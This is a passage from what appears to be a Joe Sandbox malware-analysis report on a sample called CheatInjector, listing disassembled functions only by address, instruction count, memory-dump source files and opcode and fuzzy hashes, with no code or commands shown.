                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bfd70035a73d9ff4d068824b309ff3f90d9d80446a8f1486db71920952dd440a
                                                                • Instruction ID: 8f28aed4a51ada24c7fd9d1fae46b208d7b9fdb2a2729986963255bea417f98e
                                                                • Opcode Fuzzy Hash: bfd70035a73d9ff4d068824b309ff3f90d9d80446a8f1486db71920952dd440a
                                                                • Instruction Fuzzy Hash: 1F02C2356083458FC728CF29C89176FBBE2EFD9304F08892EE5D687391DA799844CB56
                                                                Function 004F1D10 Relevance: .4, Instructions: 404COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6178b43800d97ff0801b4792793b0ec302c2886ca576a9d5d2db24c2600ccd04
                                                                • Instruction ID: 9b2487d1cff750f9e0cd4fd43268c85b7681b43e658e96b29d468ee1a865d07e
                                                                • Opcode Fuzzy Hash: 6178b43800d97ff0801b4792793b0ec302c2886ca576a9d5d2db24c2600ccd04
                                                                • Instruction Fuzzy Hash: 19D1E672A083059BC708CF24C98066BB7E5EFC4750F158A2EFA95973A0E775DC45CB8A
                                                                Function 0050DBAD Relevance: .4, Instructions: 386COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0be09355ff3f10a402f6a617a5843b9c3340f80bc6a4505053760dcb2d60663
                                                                • Instruction ID: ab6be17bddca31d48d80266628135d0c264b4ce234299704eb61868449794f2e
                                                                • Opcode Fuzzy Hash: c0be09355ff3f10a402f6a617a5843b9c3340f80bc6a4505053760dcb2d60663
                                                                • Instruction Fuzzy Hash: 5FC180B4900B00ABD7209F39C946B17BBB4FF15314F144A1DE89A8B795E335A415CBE6
                                                                Function 0051F1C8 Relevance: .4, Instructions: 369COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd2b115b2132020b5ad3354bbbca46d83c35c8cd2bdfe8ccaa153df4de620bce
                                                                • Instruction ID: 0c0fc9843e034562757afa3da623a480739c029d704600eac4c10d02ee4e20f9
                                                                • Opcode Fuzzy Hash: dd2b115b2132020b5ad3354bbbca46d83c35c8cd2bdfe8ccaa153df4de620bce
                                                                • Instruction Fuzzy Hash: D5B1D770508B818FE7268F3980607E3BFE1AF53314F1849ADC4EB87692D779A54ACB51
                                                                Function 00530F30 Relevance: .3, Instructions: 345COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5ba64c4575e109b8d360e42033a7adf279ce394d6eed496d7fb4de374d60363
                                                                • Instruction ID: 3e6b21bb91bb742b5fa896edbe72a91450b6069d2801f4a836ac39be37b8a783
                                                                • Opcode Fuzzy Hash: a5ba64c4575e109b8d360e42033a7adf279ce394d6eed496d7fb4de374d60363
                                                                • Instruction Fuzzy Hash: 94B143B2A087544BE714DB29CC5176BBBD9BBC4314F09493DFA9487382EA70EC04879A
                                                                Function 004CEB69 Relevance: .3, Instructions: 344COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9cada766fe0cb0a1c624da5e69199a2a91d3b3b38d691eac52480af6249d39eb
                                                                • Instruction ID: 7e99012fcb97170a8b21cdc22b2ba62c82a5b93e4616a6c7d0871e4d358d67b4
                                                                • Opcode Fuzzy Hash: 9cada766fe0cb0a1c624da5e69199a2a91d3b3b38d691eac52480af6249d39eb
                                                                • Instruction Fuzzy Hash: 4EC1CF789006468FCBA4CF2AC480FBBB7A2AF05314F14461FD4539B391D739AD46CB5A
                                                                Function 0050335D Relevance: .3, Instructions: 343COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 941ecf1a958dfa370fec7edb0d065c749929670ce4148d42199ea8ee0efb9719
                                                                • Instruction ID: 357c3ba44dff52f4f821a9facc256562b785442ce6e0bbe1806303241cee7d5f
                                                                • Opcode Fuzzy Hash: 941ecf1a958dfa370fec7edb0d065c749929670ce4148d42199ea8ee0efb9719
                                                                • Instruction Fuzzy Hash: E6D10772614F408BC7249A39C85536BBFE2AB95324F198E2DD5EBC73C2E678E501CB01
                                                                Function 0051E895 Relevance: .3, Instructions: 334COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 545a6541177e5724b8b633b281acaa9ef1044e5a1bdd540942b2039f977a13a1
                                                                • Instruction ID: e43286a6dc35a6970bd4539977db5a8c2efc572c00c1163c7aff3acaa789d8f0
                                                                • Opcode Fuzzy Hash: 545a6541177e5724b8b633b281acaa9ef1044e5a1bdd540942b2039f977a13a1
                                                                • Instruction Fuzzy Hash: 43A1F6716047428BE7208B25C8927A3BFE2BFA6310F188A5DD8D74B3C2D775B445CB61
                                                                Function 0051F417 Relevance: .3, Instructions: 328COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e3ce78d639438d8d3a868bc8ac314c25736b7533ad2e65b052d237ff33bdc08
                                                                • Instruction ID: a0857a6d1bc4d5c957cba09211eba96d95779b5dec25987a6b9f3bc47d687134
                                                                • Opcode Fuzzy Hash: 7e3ce78d639438d8d3a868bc8ac314c25736b7533ad2e65b052d237ff33bdc08
                                                                • Instruction Fuzzy Hash: C0A1C470508B818FE7258F3980507E3BFE1AF53304F1849AED4EB87692D779A54ACB51
                                                                Function 0050544A Relevance: .3, Instructions: 320COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2932259a8fa40796e503b7dcdb3ef3c0593576892b48bbeb4cd0e1c7e620ae1b
                                                                • Instruction ID: 82a261b72865d9f8326440ca83216497c1692368b027e1a406fbdfae96c0fc3a
                                                                • Opcode Fuzzy Hash: 2932259a8fa40796e503b7dcdb3ef3c0593576892b48bbeb4cd0e1c7e620ae1b
                                                                • Instruction Fuzzy Hash: 73C12572A14F804BC7258A38C85536BBFD2AB96224F5D8E3DD4E7C73C2E679D4058B01
                                                                Function 004F9760 Relevance: .3, Instructions: 303COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1054845eb436872c1e3fc9390f0458e4467fa775b459afc02bbdde2c6b4011ac
                                                                • Instruction ID: 510070ef1ac0174a1777705a195665b5a354265f2b9a4719d8f11b74e232d6be
                                                                • Opcode Fuzzy Hash: 1054845eb436872c1e3fc9390f0458e4467fa775b459afc02bbdde2c6b4011ac
                                                                • Instruction Fuzzy Hash: C6C16CB29087458FC360CF28DC96BABB7E1BF85318F08492DD2D9C6342E778A555CB46
                                                                Function 00533BA0 Relevance: .3, Instructions: 291COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 31f8f5e4fd7508af241d5dd67039f38c4953a10e25d447bbc2f8994bf2dfd50d
                                                                • Instruction ID: 9eaad3f0c221e1aee76c564afab1de9330a180843aabdcef4a40993c91f20f18
                                                                • Opcode Fuzzy Hash: 31f8f5e4fd7508af241d5dd67039f38c4953a10e25d447bbc2f8994bf2dfd50d
                                                                • Instruction Fuzzy Hash: 1481E1716083459FC724CE28D89167BBBE1FF95310F15892CE5A6CB291E731DE05CB92
                                                                Function 00521D70 Relevance: .3, Instructions: 286COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bce42389474e65633230c9562e61828af16a0ad6158dad3aa387127ad26b2b85
                                                                • Instruction ID: 105e97d2bdb66487866fcacc1b775dd431bd3ff53a6408c5eac0897794995592
                                                                • Opcode Fuzzy Hash: bce42389474e65633230c9562e61828af16a0ad6158dad3aa387127ad26b2b85
                                                                • Instruction Fuzzy Hash: BFB11476608B818FD3158F38D8903A6BFE2AFD6314F19897CD5E6873D2D639A805C712
                                                                Function 005338C0 Relevance: .3, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 146615df5560dcdd463c92762c7bef9718b3549d669d52bf2694c4517cbc44f5
                                                                • Instruction ID: d2f646af6dfad182c41e734c4408e6246cd53434ac792100ed4afd5ad221965d
                                                                • Opcode Fuzzy Hash: 146615df5560dcdd463c92762c7bef9718b3549d669d52bf2694c4517cbc44f5
                                                                • Instruction Fuzzy Hash: A281E235A083519BC725CF28C890A6BFBE2FF99710F15862CE9958B3A1D771ED41CB81
                                                                Function 005335E0 Relevance: .3, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 522460989c507e9579048eb89ec339f3694cd58dc2077b09586b825c53e2bfbc
                                                                • Instruction ID: a3f7fd9acce64acda699ad209dc254a7ac7e290236454f5bc83229fd2b957ce1
                                                                • Opcode Fuzzy Hash: 522460989c507e9579048eb89ec339f3694cd58dc2077b09586b825c53e2bfbc
                                                                • Instruction Fuzzy Hash: D5818C746083019FD715DF18C891A6EBBE2FF99710F19892CE9848B361E731ED51CB82
                                                                Function 00520B45 Relevance: .3, Instructions: 274COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f7ffaf6db80499a84a93aae15dd17d1b30f2edd6c573c0df71023e5c7c1e387c
                                                                • Instruction ID: c22a7c1988562be8382b0bb064ad848cab5494b208ad7dd2075ded3d05bb6ba9
                                                                • Opcode Fuzzy Hash: f7ffaf6db80499a84a93aae15dd17d1b30f2edd6c573c0df71023e5c7c1e387c
                                                                • Instruction Fuzzy Hash: 55B15476A09B818FD3158F38D890366BFE2BFDA314F19896CC5CA4B393D634A845C752
                                                                Function 004F3969 Relevance: .3, Instructions: 274COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df820701422c575d00f9b857579aced11906fa4501620db00d567447e01c0d00
                                                                • Instruction ID: 69ee3f10c144186a3d86e96be7c52b36aa742ce8a21b407a03d1dc9c5882be66
                                                                • Opcode Fuzzy Hash: df820701422c575d00f9b857579aced11906fa4501620db00d567447e01c0d00
                                                                • Instruction Fuzzy Hash: 54A13AB2A0834A8BD7158F19C440337BBA3AFE030AF19856FDA594B351E779DE05C35A
                                                                Function 005066E7 Relevance: .3, Instructions: 272COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3fa9e5bead77b684e7bf7a8621bad2b923868a0043df1114ec218a315f16a7b1
                                                                • Instruction ID: 0c5fabd089c4e64b4003ed451a7f11df273febc0c9bcd53fca59feb8e01c53f6
                                                                • Opcode Fuzzy Hash: 3fa9e5bead77b684e7bf7a8621bad2b923868a0043df1114ec218a315f16a7b1
                                                                • Instruction Fuzzy Hash: F0B1F5B2614B418FD325CA38C8953ABBFD2AB95314F5D8A3DC5EBC33C2DA7464058711
                                                                Function 00533350 Relevance: .3, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d863362cccafa471216c3e049f0a9a78809ed0a5d58d071d2c36a7e5c35bd21b
                                                                • Instruction ID: 506231fd52b0d55d8278dabd7e270bd9551d547057974070904bdbe741c490f9
                                                                • Opcode Fuzzy Hash: d863362cccafa471216c3e049f0a9a78809ed0a5d58d071d2c36a7e5c35bd21b
                                                                • Instruction Fuzzy Hash: 9561F3316083029BDB11DF28D850A6FBBE2FFD5710F19892CE5858B2A1EB34DD51C796
                                                                Function 005221C0 Relevance: .2, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
